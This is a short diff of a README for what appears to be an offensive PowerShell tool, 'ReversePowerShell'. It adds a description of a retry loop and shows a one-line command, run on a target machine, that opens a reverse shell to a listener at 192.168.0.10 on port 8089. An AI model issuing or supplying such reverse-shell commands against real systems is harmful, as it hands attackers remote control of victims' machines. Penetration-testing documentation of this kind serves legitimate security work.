tobor88/ReversePowerShell/README.md

 #### ISSUE REVERSE SHELL CONNECTION
 The below command is to be issued on the Target Machine to connect to the listener over port 8089.
 This will not be able to complete a connection to the Start-Bind cmdlet.
+If a connection failes a loop will be started that begins a 30 second visual countdown timer.
+After 30 seconds the connection will attempt to re-establish the shell.
 ```powershell
 Invoke-ReversePowerShell -IpAddress 192.168.0.10 -Port 8089
 ```